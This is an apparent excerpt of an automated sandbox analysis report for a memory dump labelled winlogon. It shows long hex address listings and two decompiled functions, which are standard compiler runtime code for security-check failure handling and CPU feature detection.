    0x00d79ac8
    0x00d79ace
    0x00d79ad4
    0x00d79ad7
    0x00d79ada
    0x00d79ae0
    0x00d79ae3
    0x00d79ae6
    0x00d79af0
    0x00d79af0
    0x00d79af0
    0x00d79ae8
    0x00d79ae8
    0x00d79aea
    0x00000000
    0x00d79aec
    0x00d79aec
    0x00d79aec
    0x00d79aea
    0x00d79af2
    0x00d79af4
    0x00d79be9
    0x00d79be9
    0x00d79beb
    0x00d79bf0
    0x00d79bf1
    0x00d79bf7
    0x00d79c03
    0x00d79c0a
    0x00d79c0b
    0x00d79c0c
    0x00d79c11
    0x00d79afa
    0x00d79afa
    0x00d79afc
    0x00000000
    0x00d79b02
    0x00d79b04
    0x00d79b05
    0x00d79b07
    0x00d79b09
    0x00d79b0b
    0x00d79b0b
    0x00d79b11
    0x00d79b13
    0x00d79b19
    0x00d79b1c
    0x00d79b2a
    0x00d79b30
    0x00d79b30
    0x00d79b32
    0x00d79b35
    0x00d79b3b
    0x00d79b3b
    0x00d79b3d
    0x00000000
    0x00000000
    0x00d79b3f
    0x00d79b41
    0x00d79b47
    0x00d79b47
    0x00d79b43
    0x00d79b43
    0x00d79b43
    0x00d79b4c
    0x00d79b4e
    0x00d79b5b
    0x00d79b5b
    0x00d79b50
    0x00d79b56
    0x00d79b56
    0x00d79b79
    0x00d79b81
    0x00d79b88
    0x00d79b8f
    0x00d79b90
    0x00d79b93
    0x00d79b99
    0x00d79b9f
    0x00d79ba2
    0x00d79ba4
    0x00000000
    0x00d79ba4
    0x00000000
    0x00d79ba2
    0x00d79bac
    0x00d79bb2
    0x00d79bb2
    0x00d79bb8
    0x00d79bba
    0x00d79bc4
    0x00d79bc6
    0x00d79bc6
    0x00d79bc6
    0x00d79bc8
    0x00d79bcf
    0x00d79bd4
    0x00d79be1
    0x00d79bd6
    0x00d79bd9
    0x00d79bd9
    0x00d79bd4
    0x00d79afc
    0x00d79c14
    0x00d79c1f
    0x00d79c20
    0x00d79c21
    0x00d79c27
    0x00d79c2d
    0x00d79c33
    0x00d79c33
    0x00000000
    0x00d79a6c
    0x00000000
    0x00d79a52
    0x00d79c34
    0x00d79c3a
    0x00d79c41
    0x00d79c42
    0x00d79c43
    0x00d79c48
    0x00d79c48
    0x00d7a0ac
    0x00d7a0b6
    0x00d7a0b7
    0x00d7a0bd
    0x00d7a0bf
    0x00d7a528
    0x00d7a52a
    0x00d7a52c
    0x00d7a532
    0x00d7a534
    0x00d7a53a
    0x00d7a53c
    0x00d7a88e
    0x00d7a88e
    0x00d7a890
    0x00d7a896
    0x00d7a89d
    0x00d7a8a3
    0x00d7a8a5
    0x00d7a943
    0x00d7a943
    0x00d7a945
    0x00d7a946
    0x00d7a94c
    0x00000000
    0x00d7a8ab
    0x00d7a8ab
    0x00d7a8ae
    0x00d7a8b4
    0x00d7a8ba
    0x00d7a8bc
    0x00d7a8c2
    0x00d7a8c4
    0x00d7a8c4
    0x00d7a8c6
    0x00d7a8c6
    0x00d7a8cf
    0x00d7a8d6
    0x00d7a8dc
    0x00d7a8df
    0x00d7a8e0
    0x00d7a8e2
    0x00d7a8e2
    0x00d7a8e6
    0x00d7a8e8
    0x00d7a8ea
    0x00d7a8f0
    0x00d7a8f3
    0x00000000
    0x00d7a8f5
    0x00d7a8f5
    0x00d7a8fc
    0x00d7a8fc
    0x00d7a8f3
    0x00d7a8e8
    0x00d7a8bc
    0x00d7a8ae
    0x00d7a8a5
    0x00d7a542
    0x00d7a542
    0x00d7a542
    0x00d7a545
    0x00d7a549
    0x00d7a549
    0x00d7a54a
    0x00d7a55c
    0x00d7a569
    0x00d7a578
    0x00d7a5a2
    0x00d7a5a7
    0x00d7a5ad
    0x00d7a5b0
    0x00d7a5b6
    0x00d7a5b9
    0x00d7a652
    0x00d7a659
    0x00d7a6d7
    0x00d7a6dd
    0x00d7a6e3
    0x00d7a6e6
    0x00d7a6e8
    0x00d7a771
    0x00d7a6ee
    0x00d7a6ee
    0x00d7a6f4
    0x00d7a6f4
    0x00d7a6fa
    0x00d7a700
    0x00d7a702
    0x00d7a704
    0x00d7a704
    0x00d7a70a
    0x00d7a710
    0x00d7a712
    0x00d7a71a
    0x00d7a71a
    0x00d7a720
    0x00d7a722
    0x00d7a724
    0x00d7a72a
    0x00d7a72c
    0x00d7a843
    0x00d7a845
    0x00d7a84b
    0x00d7a84b
    0x00d7a84e
    0x00d7a84f
    0x00000000
    0x00d7a732
    0x00d7a738
    0x00d7a738
    0x00d7a73a
    0x00d7a740
    0x00d7a743
    0x00d7a74a
    0x00d7a750
    0x00d7a752
    0x00d7a779
    0x00d7a77b
    0x00d7a77d
    0x00d7a77f
    0x00d7a785
    0x00d7a78b
    0x00d7a825
    0x00d7a825
    0x00d7a828
    0x00000000
    0x00d7a82e
    0x00d7a82e
    0x00d7a834
    0x00000000
    0x00d7a834
    0x00d7a791
    0x00d7a791
    0x00d7a791
    0x00d7a794
    0x00000000
    0x00000000
    0x00d7a796
    0x00d7a798
    0x00d7a79a
    0x00d7a7a3
    0x00d7a7a3
    0x00d7a7a5
    0x00d7a7ab
    0x00d7a7ab
    0x00d7a7b7
    0x00d7a7c2
    0x00d7a7c5
    0x00d7a7d2
    0x00d7a7d5
    0x00d7a7d6
    0x00d7a7d7
    0x00d7a7dd
    0x00d7a7df
    0x00d7a7e5
    0x00d7a7eb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d7a7ed
    0x00d7a7ed
    0x00d7a7ed
    0x00d7a7ef
    0x00000000
    0x00000000
    0x00d7a7f1
    0x00d7a7f4
    0x00000000
    0x00d7a7fa
    0x00d7a7fa
    0x00d7a7fc
    0x00d7a7fe
    0x00d7a7fe
    0x00d7a7fe
    0x00d7a806
    0x00d7a809
    0x00d7a809
    0x00d7a80f
    0x00d7a811
    0x00d7a813
    0x00d7a81a
    0x00d7a820
    0x00d7a822
    0x00000000
    0x00d7a822
    0x00000000
    0x00d7a7f4
    0x00000000
    0x00d7a7ed
    0x00000000
    0x00d7a791
    0x00d7a754
    0x00d7a754
    0x00d7a756
    0x00d7a75c
    0x00d7a763
    0x00d7a763
    0x00d7a766
    0x00d7a766
    0x00000000
    0x00d7a756
    0x00000000
    0x00d7a83a
    0x00d7a83a
    0x00d7a83b
    0x00d7a83b
    0x00000000
    0x00d7a740
    0x00d7a65b
    0x00d7a65b
    0x00d7a666
    0x00d7a66d
    0x00d7a673
    0x00d7a67a
    0x00d7a67b
    0x00d7a67c
    0x00d7a681
    0x00d7a684
    0x00d7a686
    0x00000000
    0x00d7a68c
    0x00d7a68c
    0x00d7a68f
    0x00000000
    0x00d7a695
    0x00d7a695
    0x00d7a69c
    0x00000000
    0x00d7a6a2
    0x00d7a6a8
    0x00d7a6aa
    0x00d7a6b0
    0x00d7a6b0
    0x00d7a6b2
    0x00d7a6b2
    0x00d7a6b4
    0x00d7a6bd
    0x00d7a6c4
    0x00d7a6c7
    0x00d7a6c8
    0x00d7a6ca
    0x00d7a6ca
    0x00000000
    0x00d7a6d2
    0x00d7a69c
    0x00d7a68f
    0x00d7a686
    0x00d7a5bf
    0x00d7a5bf
    0x00d7a5c5
    0x00d7a5c7
    0x00d7a5e3
    0x00d7a5e6
    0x00000000
    0x00d7a5ec
    0x00d7a5ec
    0x00d7a5f3
    0x00000000
    0x00d7a5f9
    0x00d7a5ff
    0x00d7a601
    0x00d7a607
    0x00d7a607
    0x00d7a609
    0x00d7a609
    0x00d7a60b
    0x00d7a614
    0x00d7a61b
    0x00d7a61e
    0x00d7a61f
    0x00d7a621
    0x00d7a621
    0x00d7a629
    0x00d7a629
    0x00d7a62b
    0x00000000
    0x00d7a631
    0x00d7a631
    0x00d7a637
    0x00d7a63a
    0x00d7a904
    0x00d7a906
    0x00d7a907
    0x00d7a90d
    0x00d7a919
    0x00d7a920
    0x00d7a921
    0x00d7a922
    0x00d7a927
    0x00d7a92a
    0x00d7a640
    0x00d7a640
    0x00d7a647
    0x00000000
    0x00d7a647
    0x00d7a63a
    0x00d7a62b
    0x00d7a5f3
    0x00d7a5c9
    0x00d7a5c9
    0x00d7a5cb
    0x00d7a5d1
    0x00d7a5d7
    0x00d7a5d8
    0x00d7a855
    0x00d7a855
    0x00d7a85c
    0x00d7a85d
    0x00d7a85e
    0x00d7a863
    0x00d7a866
    0x00d7a866
    0x00d7a866
    0x00d7a5c7
    0x00d7a868
    0x00d7a868
    0x00d7a86a
    0x00d7a931
    0x00d7a938
    0x00d7a93f
    0x00d7a952
    0x00d7a958
    0x00d7a959
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d7a870
    0x00d7a876
    0x00d7a876
    0x00d7a87c
    0x00d7a87c
    0x00d7a888
    0x00000000
    0x00d7a888
    0x00d7a0c5
    0x00d7a0c5
    0x00d7a0c7
    0x00d7a0cd
    0x00d7a0cf
    0x00d7a0d5
    0x00d7a0d7
    0x00d7a44e
    0x00d7a44e
    0x00d7a450
    0x00d7a456
    0x00d7a45d
    0x00d7a45f
    0x00d7a4be
    0x00d7a4c1
    0x00d7a4c7
    0x00d7a4cd
    0x00d7a4d3
    0x00d7a4d5
    0x00d7a4db
    0x00d7a4dd
    0x00d7a4dd
    0x00d7a4df
    0x00d7a4df
    0x00d7a4e1
    0x00d7a4ea
    0x00d7a4f1
    0x00d7a4f4
    0x00d7a4f5
    0x00d7a4f7
    0x00d7a4f7
    0x00d7a4ff
    0x00d7a501
    0x00d7a507
    0x00d7a50d
    0x00d7a510
    0x00000000
    0x00d7a516
    0x00d7a516
    0x00d7a51d
    0x00d7a51d
    0x00d7a510
    0x00d7a501
    0x00d7a4d5
    0x00d7a461
    0x00d7a461
    0x00d7a463
    0x00d7a469
    0x00d7a46f
    0x00000000
    0x00d7a46f
    0x00d7a45f
    0x00d7a0dd
    0x00d7a0dd
    0x00d7a0dd
    0x00d7a0e0
    0x00d7a0e4
    0x00d7a0e4
    0x00d7a0e5
    0x00d7a0f7
    0x00d7a104
    0x00d7a113
    0x00d7a13d
    0x00d7a142
    0x00d7a148
    0x00d7a14b
    0x00d7a151
    0x00d7a154
    0x00d7a1d0
    0x00d7a1d7
    0x00d7a29b
    0x00d7a2a1
    0x00d7a2a7
    0x00d7a2aa
    0x00d7a2ac
    0x00d7a335
    0x00d7a2b2
    0x00d7a2b2
    0x00d7a2b8
    0x00d7a2b8
    0x00d7a2be
    0x00d7a2c4
    0x00d7a2c6
    0x00d7a2c8
    0x00d7a2c8
    0x00d7a2ce
    0x00d7a2d4
    0x00d7a2d6
    0x00d7a2de
    0x00d7a2de
    0x00d7a2e4
    0x00d7a2e6
    0x00d7a2e8
    0x00d7a2ee
    0x00d7a2f0
    0x00d7a407
    0x00d7a409
    0x00d7a40f
    0x00d7a40f
    0x00000000
    0x00d7a2f6
    0x00d7a2fc
    0x00d7a2fc
    0x00d7a2fe
    0x00d7a304
    0x00d7a307
    0x00d7a30e
    0x00d7a314
    0x00d7a316
    0x00d7a33d
    0x00d7a33f
    0x00d7a341
    0x00d7a343
    0x00d7a349
    0x00d7a34f
    0x00d7a3e9
    0x00d7a3e9
    0x00d7a3ec
    0x00000000
    0x00d7a3f2
    0x00d7a3f2
    0x00d7a3f8
    0x00000000
    0x00d7a3f8
    0x00d7a355
    0x00d7a355
    0x00d7a355
    0x00d7a358
    0x00000000
    0x00000000
    0x00d7a35a
    0x00d7a35c
    0x00d7a35e
    0x00d7a367
    0x00d7a367
    0x00d7a369
    0x00d7a36f
    0x00d7a36f
    0x00d7a37b
    0x00d7a386
    0x00d7a389
    0x00d7a396
    0x00d7a399
    0x00d7a39a
    0x00d7a39b
    0x00d7a3a1
    0x00d7a3a3
    0x00d7a3a9
    0x00d7a3af
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d7a3b1
    0x00d7a3b1
    0x00d7a3b1
    0x00d7a3b3
    0x00000000
    0x00000000
    0x00d7a3b5
    0x00d7a3b8
    0x00d7a472
    0x00d7a472
    0x00d7a474
    0x00d7a47a
    0x00d7a480
    0x00d7a481
    0x00000000
    0x00d7a3be
    0x00d7a3be
    0x00d7a3c0
    0x00d7a3c2
    0x00d7a3c2
    0x00d7a3c2
    0x00d7a3ca
    0x00d7a3cd
    0x00d7a3cd
    0x00d7a3d3
    0x00d7a3d5
    0x00d7a3d7
    0x00d7a3de
    0x00d7a3e4
    0x00d7a3e6
    0x00000000
    0x00d7a3e6
    0x00000000
    0x00d7a3b8
    0x00000000
    0x00d7a3b1
    0x00000000
    0x00d7a355
    0x00d7a318
    0x00d7a318
    0x00d7a31a
    0x00d7a320
    0x00d7a327
    0x00d7a327
    0x00d7a32a
    0x00d7a32a
    0x00000000
    0x00d7a31a
    0x00000000
    0x00d7a3fe
    0x00d7a3fe
    0x00d7a3ff
    0x00d7a3ff
    0x00000000
    0x00d7a304
    0x00d7a1dd
    0x00d7a1dd
    0x00d7a1e8
    0x00d7a1ef
    0x00d7a1f5
    0x00d7a1fc
    0x00d7a1fd
    0x00d7a1fe
    0x00d7a203
    0x00d7a206
    0x00d7a208
    0x00d7a224
    0x00d7a227
    0x00000000
    0x00d7a22d
    0x00d7a22d
    0x00d7a234
    0x00000000
    0x00d7a23a
    0x00d7a240
    0x00d7a242
    0x00d7a248
    0x00d7a248
    0x00d7a24a
    0x00d7a24a
    0x00d7a24c
    0x00d7a255
    0x00d7a25c
    0x00d7a25f
    0x00d7a260
    0x00d7a262
    0x00d7a262
    0x00000000
    0x00d7a24a
    0x00d7a234
    0x00d7a20a
    0x00d7a20c
    0x00d7a212
    0x00d7a218
    0x00d7a219
    0x00000000
    0x00d7a219
    0x00d7a208
    0x00d7a156
    0x00d7a156
    0x00d7a15c
    0x00d7a15e
    0x00d7a173
    0x00d7a176
    0x00000000
    0x00d7a17c
    0x00d7a17c
    0x00d7a183
    0x00000000
    0x00d7a189
    0x00d7a18f
    0x00d7a191
    0x00d7a197
    0x00d7a197
    0x00d7a199
    0x00d7a199
    0x00d7a19b
    0x00d7a1a4
    0x00d7a1ab
    0x00d7a1ae
    0x00d7a1af
    0x00d7a1b1
    0x00d7a1b1
    0x00d7a26a
    0x00d7a26a
    0x00d7a26c
    0x00000000
    0x00d7a272
    0x00d7a272
    0x00d7a278
    0x00d7a27b
    0x00d7a1be
    0x00d7a1c5
    0x00000000
    0x00d7a281
    0x00d7a283
    0x00d7a289
    0x00d7a28f
    0x00d7a290
    0x00d7a487
    0x00d7a487
    0x00d7a48e
    0x00d7a48f
    0x00d7a490
    0x00d7a495
    0x00d7a498
    0x00d7a498
    0x00d7a27b
    0x00d7a26c
    0x00d7a183
    0x00d7a160
    0x00d7a160
    0x00d7a162
    0x00d7a168
    0x00d7a412
    0x00d7a412
    0x00d7a413
    0x00d7a419
    0x00d7a419
    0x00d7a420
    0x00d7a421
    0x00d7a422
    0x00d7a427
    0x00d7a42a
    0x00d7a42a
    0x00d7a42a
    0x00d7a15e
    0x00d7a42c
    0x00d7a42c
    0x00d7a42e
    0x00d7a49c
    0x00d7a4a3
    0x00d7a4a3
    0x00d7a4a3
    0x00d7a4aa
    0x00d7a4ac
    0x00d7a4b2
    0x00d7a4b3
    0x00d7a95f
    0x00d7a95f
    0x00d7a960
    0x00d7a961
    0x00d7a966
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d7a430
    0x00d7a436
    0x00d7a436
    0x00d7a43c
    0x00d7a43c
    0x00d7a448
    0x00000000
    0x00d7a448
    0x00d7a0d7
    0x00d7a969
    0x00d7a969
    0x00d7a96f
    0x00d7a971
    0x00d7a977
    0x00d7a97d
    0x00d7a97f
    0x00d7a981
    0x00d7a983
    0x00d7a983
    0x00d7a985
    0x00d7a985
    0x00d7a98e
    0x00d7a98f
    0x00d7a993
    0x00d7a99a
    0x00d7a99d
    0x00d7a99e
    0x00d7a9a0
    0x00d7a9a0
    0x00d7a9a4
    0x00d7a9aa
    0x00d7a9ac
    0x00d7a9b2
    0x00d7a9b4
    0x00d7a9ba
    0x00d7a9bd
    0x00d7a9d0
    0x00d7a9d2
    0x00d7a9d3
    0x00d7a9d9
    0x00d7a9e5
    0x00d7a9ec
    0x00d7a9ed
    0x00d7a9ee
    0x00d7a9f3
    0x00d7a9bf
    0x00d7a9c1
    0x00d7a9c8
    0x00d7a9c8
    0x00d7a9bd
    0x00d7a9f6
    0x00d7a9f6
    0x00d7aa06
    0x00d7aa0f
    0x00d7aa10
    0x00d7aa12
    0x00d7aaa9
    0x00d7aaab
    0x00d7aab6
    0x00d7aab6
    0x00d7aab8
    0x00d7aabb
    0x00d7aabd
    0x00000000
    0x00d7aaad
    0x00d7aab3
    0x00d7aab3
    0x00d7aa18
    0x00d7aa18
    0x00d7aa1e
    0x00d7aa21
    0x00d7aa27
    0x00d7aa2a
    0x00d7aa30
    0x00d7aa32
    0x00d7aa38
    0x00d7aa3a
    0x00d7aa3c
    0x00d7aa3c
    0x00d7aa3e
    0x00d7aa3e
    0x00d7aa4b
    0x00d7aa52
    0x00d7aa55
    0x00d7aa56
    0x00d7aa58
    0x00d7aa59
    0x00d7aa59
    0x00d7aa5d
    0x00d7aa63
    0x00d7aa65
    0x00d7aa67
    0x00d7aa6d
    0x00d7aa70
    0x00d7aa83
    0x00d7aa84
    0x00d7aa8a
    0x00d7aa96
    0x00d7aa9d
    0x00d7aa9e
    0x00d7aa9f
    0x00d7aaa4
    0x00d7aa72
    0x00d7aa72
    0x00d7aa79
    0x00d7aa79
    0x00d7aa70
    0x00d7aa65
    0x00d7aac3
    0x00d7aac3
    0x00d7aac3
    0x00d7aacf
    0x00d7aad2
    0x00d7aad8
    0x00d7aada
    0x00d7aadc
    0x00d7aae2
    0x00d7aae4
    0x00d7aae4
    0x00d7aae4
    0x00d7aae2
    0x00d7aae9
    0x00d7aaea
    0x00d7aaec
    0x00d7aaee
    0x00d7aaee
    0x00d7aaf0
    0x00d7aaf6
    0x00d7aafc
    0x00d7aafe
    0x00d7ab04
    0x00d7ab04
    0x00d7ab0a
    0x00d7ab0c
    0x00000000
    0x00000000
    0x00d7ab12
    0x00d7ab14
    0x00d7ab16
    0x00d7ab16
    0x00d7ab18
    0x00d7ab18
    0x00d7ab28
    0x00d7ab2f
    0x00d7ab32
    0x00d7ab33
    0x00d7ab35
    0x00d7ab35
    0x00d7ab39
    0x00d7ab3f
    0x00d7ab41
    0x00d7ab43
    0x00d7ab49
    0x00d7ab4c
    0x00d7ab5d
    0x00d7ab5f
    0x00d7ab60
    0x00d7ab66
    0x00d7ab72
    0x00d7ab79
    0x00d7ab7a
    0x00d7ab7b
    0x00d7ab80
    0x00d7ab4e
    0x00d7ab4e
    0x00d7ab55
    0x00d7ab55
    0x00d7ab4c
    0x00d7ab91
    0x00d7aba0
    0x00d7aba1
    0x00d7aba1
    0x00d7aba3
    0x00d7aba5
    0x00d7aba5
    0x00d7abab
    0x00d7abae
    0x00d7abb0
    0x00d7abb2
    0x00d7abb2
    0x00d7abb5
    0x00d7abb6
    0x00d7abb6
    0x00d7abbb
    0x00d7abbe
    0x00d7abc2
    0x00d7abc2
    0x00d7abc3
    0x00d7abc5
    0x00d7abcb
    0x00d7abd1
    0x00000000
    0x00000000
    0x00000000
    0x00d7abd1
    0x00d7ab04
    0x00d7abd7
    0x00d7abd7
    0x00000000
    0x00d7abd7
    0x00d7995c
    0x00d79953
    0x00d7994a
    0x00d79901
    0x00d79905
    0x00d7990d
    0x00000000
    0x00d7990f
    0x00d79915
    0x00d7991a
    0x00d7abf6
    0x00d7abf6
    0x00d7abf9
    0x00d7ac04
    0x00d7ac2f
    0x00d7ac30
    0x00d7ac31
    0x00d7ac32
    0x00d7ac33
    0x00d7ac34
    0x00d7ac39
    0x00d7ac3c
    0x00d7ac3f
    0x00d7ac40
    0x00d7ac43
    0x00d7ac45
    0x00d7ac4b
    0x00d7ac4e
    0x00d7ac50
    0x00d7ac65
    0x00d7ac66
    0x00d7ac69
    0x00d7ac6b
    0x00d7ac81
    0x00d7ac87
    0x00d7ac8f
    0x00d7ac91
    0x00d7ac9c
    0x00d7ac9f
    0x00d7acb6
    0x00d7aca1
    0x00d7aca1
    0x00d7aca6
    0x00000000
    0x00d7aca6
    0x00d7ac93
    0x00d7ac93
    0x00d7ac98
    0x00d7aca8
    0x00d7aca8
    0x00d7aca9
    0x00d7acab
    0x00d7acb0
    0x00d7acb0
    0x00d7ac6d
    0x00d7ac6d
    0x00d7ac70
    0x00000000
    0x00d7ac72
    0x00d7ac75
    0x00d7ac7d
    0x00d7ac7d
    0x00d7ac70
    0x00d7ac52
    0x00d7ac52
    0x00d7ac59
    0x00d7ac5a
    0x00d7ac5c
    0x00d7ac61
    0x00d7ac61
    0x00d7ac47
    0x00d7ac47
    0x00d7ac47
    0x00d7acba
    0x00d7ac06
    0x00d7ac06
    0x00d7ac06
    0x00d7ac10
    0x00d7ac19
    0x00d7ac1e
    0x00d7ac2c
    0x00d7ac2c
    0x00d7ac04
    0x00d7990d

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6B406, Relevance: 6.1, APIs: 4, Instructions: 75
    C-Code - Quality: 85%
    			E00D6B406(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				_Unknown_base(*)()* _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t38;
				long _t48;
				signed int _t50;
				intOrPtr _t51;
				signed char _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;

				_t57 = __edi;
				_t56 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				 *0xd90f18 = 0;
				_v632 = E00D6D520(_t57,  &_v808, 0, 0x2cc);
				_v636 = _t55;
				_v640 = _t56;
				_v644 = _t51;
				_v648 = 0;
				_v652 = _t57;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t38 =  &_v0;
				_v612 = _t38;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t38 - 4));
				E00D6D520(_t57,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t48 = UnhandledExceptionFilter( &_v12);
				if(_t48 == 0) {
					_t50 =  ~(_t54 & 0x000000ff);
					asm("sbb eax, eax");
					 *0xd90f18 =  *0xd90f18 & _t50;
					return _t50;
				}
				return _t48;
			}

































    0x00d6b406
    0x00d6b406
    0x00d6b41a
    0x00d6b41c
    0x00d6b41f
    0x00d6b41f
    0x00d6b430
    0x00d6b43e
    0x00d6b444
    0x00d6b44a
    0x00d6b450
    0x00d6b456
    0x00d6b45c
    0x00d6b462
    0x00d6b469
    0x00d6b470
    0x00d6b477
    0x00d6b47e
    0x00d6b485
    0x00d6b48c
    0x00d6b48d
    0x00d6b496
    0x00d6b49c
    0x00d6b49f
    0x00d6b4a5
    0x00d6b4b4
    0x00d6b4bf
    0x00d6b4ca
    0x00d6b4d1
    0x00d6b4d8
    0x00d6b4e2
    0x00d6b4ea
    0x00d6b4f3
    0x00d6b4f5
    0x00d6b4f8
    0x00d6b4fa
    0x00d6b504
    0x00d6b50c
    0x00d6b511
    0x00d6b513
    0x00d6b515
    0x00000000
    0x00d6b515
    0x00d6b520

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6B413
    • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00D6B4DB
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6B4FA
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6B504
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6B6CE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
    C-Code - Quality: 84%
    			E00D6B6CE(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0xd90f1c =  *0xd90f1c & 0x00000000;
				 *0xd88010 =  *0xd88010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0xd88010 =  *0xd88010 | 0x00000002;
				 *0xd90f1c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0xd90f20; // 0x0
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0xd90f20 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0xd88010 =  *0xd88010 | 0x00000004;
						 *0xd90f1c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0xd88010; // 0xf
								_t57 = _t56 | 0x00000008;
								 *0xd90f1c = 3;
								 *0xd88010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0xd90f1c = 5;
									 *0xd88010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0xd90f20; // 0x0
					_t84 = _t87 | 0x00000001;
					 *0xd90f20 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}




























    0x00d6b6ce
    0x00d6b6d1
    0x00d6b6df
    0x00d6b6ee
    0x00d6b861
    0x00d6b867
    0x00d6b867
    0x00d6b6f4
    0x00d6b6fa
    0x00d6b705
    0x00d6b70b
    0x00d6b70e
    0x00d6b70f
    0x00d6b713
    0x00d6b714
    0x00d6b716
    0x00d6b719
    0x00d6b71c
    0x00d6b725
    0x00d6b744
    0x00d6b747
    0x00d6b748
    0x00d6b749
    0x00d6b74d
    0x00d6b74e
    0x00d6b750
    0x00d6b753
    0x00d6b756
    0x00d6b759
    0x00d6b79e
    0x00d6b79e
    0x00d6b7a4
    0x00d6b7ab
    0x00d6b7ae
    0x00d6b7b1
    0x00d6b7b4
    0x00d6b7b7
    0x00d6b7bb
    0x00d6b7be
    0x00d6b7bf
    0x00d6b7c4
    0x00d6b7c7
    0x00d6b7c9
    0x00d6b7cc
    0x00d6b7cf
    0x00d6b7d2
    0x00d6b7da
    0x00d6b7dd
    0x00d6b7e0
